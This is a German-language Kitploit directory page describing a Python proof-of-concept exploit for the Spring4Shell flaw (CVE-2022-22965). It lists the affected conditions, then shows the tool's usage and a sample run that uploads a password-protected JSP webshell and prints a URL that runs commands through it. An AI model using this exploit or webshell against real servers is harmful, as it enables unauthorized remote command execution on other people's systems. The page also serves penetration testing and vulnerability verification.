Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Spring4Shell-CVE-2022-22965 — Python-basierter Proof-of-Concept-Exploit für CVE-2022-22965 (Spring4Shell), der auf Java Spring Core RCE auf Apache Tomcat abzielt. Lädt eine JSP-Webshell mit Passwortschutz für die Remote-Befehlsausführung hoch. | Kitploit
Tools/GitHubGitHub/sohamsharma966/spring4shell-cve-2022-22965
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubsohamsharma966/spring4shell-cve-2022-22965

Spring4Shell-CVE-2022-22965

Python-basierter Proof-of-Concept-Exploit für CVE-2022-22965 (Spring4Shell), der auf Java Spring Core RCE auf Apache Tomcat abzielt. Lädt eine JSP-Webshell mit Passwortschutz für die Remote-Befehlsausführung hoch.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 2 JahrenNoch nicht geprüft

Spring4Shell: CVE-2022-22965 RCE

Java Spring Framework RCE-Schwachstelle

Diese Schwachstellen betreffen eine Komponente "Spring Core" — das Herz des Frameworks

Aktuelle Bedingungen für die Schwachstelle:-

  • JDK 9+
  • Eine anfällige Version des Spring Frameworks (<5.2 | 5.2.0-19 | 5.3.0-17)
  • Apache Tomcat als Server für die Spring-Anwendung, verpackt als WAR
  • Eine Abhängigkeit von den spring-webmvc und/oder spring-webflux Komponenten des Spring Frameworks

Der Exploit

root@kitploit:~
user@attacker:~$ ./exploit.py --help
usage: exploit.py [-h] [-f FILENAME] [-p PASSWORD] [-d DIRECTORY] url

Spring4Shell RCE Proof of Concept

positional arguments:
  url                   Target URL

optional arguments:
  -h, --help            show this help message and exit
  -f FILENAME, --filename FILENAME
                        Name of the file to upload (Default tomcatwar.jsp)
  -p PASSWORD, --password PASSWORD
                        Password to protect the shell with (Default: thm)
  -d DIRECTORY, --directory DIRECTORY
                        The upload path for the file (Default: ROOT)
root@kitploit:~
user@attacker:~$ ./exploit.py http://MACHINE_IP/
Shell Uploaded Successfully!


# OUTPUT= Your shell can be found at: http://MACHINE_IP/tomcatwar.jsp?pwd=thm&cmd=whoami
Tool herunterladen